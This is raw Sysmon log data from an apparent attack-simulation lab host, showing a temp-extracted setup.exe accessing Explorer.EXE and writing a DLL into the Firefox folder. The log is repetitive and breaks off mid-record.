13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-core-localization-l1-2-0.dll2021-01-18 13:59:52.114 10341000x800000000000000014184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow